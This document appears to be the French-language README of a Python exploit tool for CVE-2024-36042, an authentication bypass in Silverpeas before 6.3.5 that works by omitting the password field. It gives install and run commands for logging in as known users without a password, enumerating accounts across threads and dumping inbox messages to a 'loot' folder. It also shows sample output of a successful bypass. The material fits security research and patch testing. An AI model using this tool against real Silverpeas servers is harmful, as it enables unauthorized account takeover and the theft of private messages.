
PoC Python pour le contournement de l'authentification CVE-2024-36042 dans Silverpeas < 6.3.5. Dispose de la détection de version, de l'énumération d'utilisateurs multithread, de l'extraction de messages et de rapports structurés pour les tests de sécurité autorisés.
Un proof-of-concept Python3 propre et de qualité professionnelle pour CVE-2024-36042 — un contournement d'authentification dans Silverpeas < 6.3.5 causé par l'absence de validation du mot de passe dans
AuthenticationServlet.
AuthenticationServlet de Silverpeas accepte une requête de connexion même lorsque le paramètre Password est omis du corps POST, accordant un accès de session authentifié à tout nom d'utilisateur connu. Cet outil démontre la vulnérabilité de manière responsable via un framework d'exploitation modulaire et multi-threadé, doté de fonctions avancées de reconnaissance, d'extraction de données et de génération de rapports professionnels.
Version affectée : Silverpeas < 6.3.5
CVE : CVE-2024-36042
GHSA : GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
L'outil prend en charge quatre modes de sortie principaux pour les messages extraits via --message-output :
console (défaut) : Affiche les messages nettoyés directement dans le terminal avec mise en évidence des mots-clés.markdown : Génère un rapport {username}_messages.md par compte dans le répertoire de sortie.files : Crée un dossier par compte et enregistre chaque message dans un fichier individuel (ex. message_0006.md) avec des identifiants complétés par des zéros pour un tri propre du système de fichiers.both : Combine les modes console et markdown.outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (optionnel : --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target URL de base de Silverpeas (obligatoire)
-u, --user Nom d'utilisateur unique à cibler
--userlist Fichier contenant un nom d'utilisateur par ligne
--dump-messages Extraire et afficher les messages de la boîte de réception
--max-id ID de message maximal à vérifier (défaut : 50)
--threads Workers concurrents (défaut : 5)
--proxy URL du proxy HTTP
--message-output Mode de sortie : {console, markdown, files, both}
--output-format Format de fichier : {md, txt}
--json Exporter un rapport JSON complet
--csv Exporter un CSV des messages extraits
--outdir Répertoire de sortie pour les exports
--no-color Désactiver la sortie couleur ANSI (utile pour les journaux)
--save-raw-html Sauvegarder les réponses HTML d'origine pour le débogage
--check-version Identifier la version uniquement
--no-exploit Ignorer l'exploitation (à associer avec --check-version)
--quiet, -q Sortie minimale
--no-banner Masquer la bannière
[*] Target : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnérable.
[*] Essai : scr1ptkiddy
[+] CONTOURNÉ -> scr1ptkiddy
[+] Données sauvegardées dans ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Résumé d'exécution
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Compte │ Statut │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ SUCCÈS │ 6 │
│ admin │ ÉCHEC │ 0 │
└───────────────┴──────────┴──────────┘
[+] Rapport JSON -> ./report_20260516_013210.json
Ce dépôt fait partie de mon portfolio en sécurité offensive. Il démontre :
Cet outil est fourni uniquement à des fins de tests de sécurité autorisés, de recherche et d'éducation. L'accès non autorisé à des systèmes informatiques est illégal. Obtenez toujours une autorisation explicite avant de tester toute infrastructure qui ne vous appartient pas.
MIT
| Fonctionnalité | Description |
|---|
| Détection de version | Identification de la version de Silverpeas et de son statut de vulnérabilité avant exploitation. |
| Multi-threadé | Énumération d'utilisateurs concurrente via ThreadPoolExecutor avec sortie thread-safe. |
| Découverte avancée | Découverte d'endpoints multilingue (anglais/français) avec sondage multi-ID. |
| Extraction de données | Dump de messages haute fidélité avec déduplication et filtrage des contenus génériques. |
| Sortie flexible | Prise en charge de la console, des rapports Markdown et des exports de fichiers individuels (.md ou .txt). |
| Proxy et débogage | Routage via Burp/ZAP (--proxy) et sauvegarde du HTML brut pour le débogage du parseur. |
| UX soignée | Tableaux récapitulatifs ASCII, mise en évidence des mots-clés et contrôle optionnel des couleurs ANSI. |